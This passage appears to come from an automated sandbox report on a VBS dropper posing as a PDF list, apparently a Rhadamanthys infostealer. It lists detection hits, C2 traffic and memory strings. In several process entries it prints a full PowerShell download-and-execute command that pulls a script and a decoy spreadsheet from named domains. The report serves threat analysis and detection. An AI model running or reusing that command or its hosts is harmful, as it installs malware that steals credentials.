                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7540, TargetFilename: C:\Users\Public\udkz59n9.vbs
                        Sigma detected: PowerShell Web Download
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ProcessId: 7540, ProcessName: powershell.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5316, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4820, ProcessName: svchost.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ProcessId: 7540, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ProcessId: 7492, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx', ProcessId: 7540, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7296, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T18:49:25.421624+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.449815TCP
                        2024-12-09T18:49:37.348409+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.449845TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T18:48:54.714981+010028032702Potentially Bad Traffic192.168.2.449754202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T18:49:03.127556+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449765TCP
                        2024-12-09T18:49:25.421624+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449815TCP
                        2024-12-09T18:49:37.348409+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449845TCP
                        2024-12-09T18:49:47.320448+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449870TCP
                        2024-12-09T18:49:54.479011+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449885TCP
                        2024-12-09T18:50:01.654660+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449903TCP
                        2024-12-09T18:50:08.956237+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449920TCP
                        2024-12-09T18:50:16.042796+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449938TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415860F0 CryptUnprotectData,18_3_00007DF4415860F0
                        Source: unknownHTTPS traffic detected: 209.124.66.28:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49870 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49885 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49903 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49920 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49938 version: TLS 1.2
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000010.00000003.2264946389.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265037346.0000000021280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268176659.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268247036.0000000005980000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000010.00000003.2264043977.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264174243.0000000021350000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267316801.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267524713.0000000005A50000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000010.00000003.2264557914.0000000021300000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264398519.0000000021160000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267843844.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268003747.0000000005A00000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000010.00000003.2264043977.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264174243.0000000021350000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267316801.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267524713.0000000005A50000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000010.00000003.2264557914.0000000021300000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2264398519.0000000021160000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2267843844.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268003747.0000000005A00000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.2116070687.0000000006E9B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpshare.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000010.00000003.2264946389.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265037346.0000000021280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268176659.0000000005860000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268247036.0000000005980000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2116070687.0000000006E34000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441580B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,18_3_00007DF441580B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp18_3_00007DF441591741
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp18_2_000002435D420511
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 4x nop then dec esp24_2_00000286F6085681
                        Source: chrome.exeMemory has grown: Private usage: 9MB later: 23MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49765
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49815
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49845
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49870
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49885
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49903
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49920
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49938
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Source: global trafficTCP traffic: 192.168.2.4:49765 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 103.53.42.63 103.53.42.63
                        Source: Joe Sandbox ViewIP Address: 209.124.66.28 209.124.66.28
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.4:49815
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.4:49845
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49754 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: global trafficHTTP traffic detected: GET /wh/wh.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.tequila.aeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /it/Emnernes123.mdp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.ftsengineers.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/List%20of%20required%20items.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.fornid.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.tequila.ae
                        Source: global trafficDNS traffic detected: DNS query: www.ftsengineers.com
                        Source: global trafficDNS traffic detected: DNS query: www.fornid.com
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: global trafficDNS traffic detected: DNS query: time.facebook.com
                        Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                        Source: global trafficDNS traffic detected: DNS query: time.windows.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
                        Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                        Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                        Source: svchost.exe, 00000012.00000003.2510299112.000002435DC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/a9b905ba/4a1b3c1a
                        Source: powershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mH/~
                        Source: powershell.exe, 00000001.00000002.3037983335.000001CC4BB37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mH/~s
                        Source: svchost.exe, 0000000F.00000002.2958981492.0000027BC5800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: wscript.exe, 00000003.00000003.1726724047.00000207BBEC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1726827645.00000207BBEC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                        Source: wscript.exe, 00000003.00000003.1726724047.00000207BBEC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1726827645.00000207BBEC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/g
                        Source: wscript.exe, 00000003.00000003.1739295433.00000207B9F6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1740765591.00000207B9F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: wscript.exe, 00000003.00000003.1739295433.00000207B9F6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1740765591.00000207B9F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: wscript.exe, 00000003.00000003.1728149495.00000207B9FCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728575861.00000207B9FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b8a0d048a68e
                        Source: wscript.exe, 00000003.00000003.1728358825.00000207BBE89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728830868.00000207BBE89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1726774021.00000207BBE89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
                        Source: wscript.exe, 00000003.00000003.1739295433.00000207B9F6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1740765591.00000207B9F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabw
                        Source: wscript.exe, 00000003.00000003.1728149495.00000207B9FCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728575861.00000207B9FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b8a0d048a
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
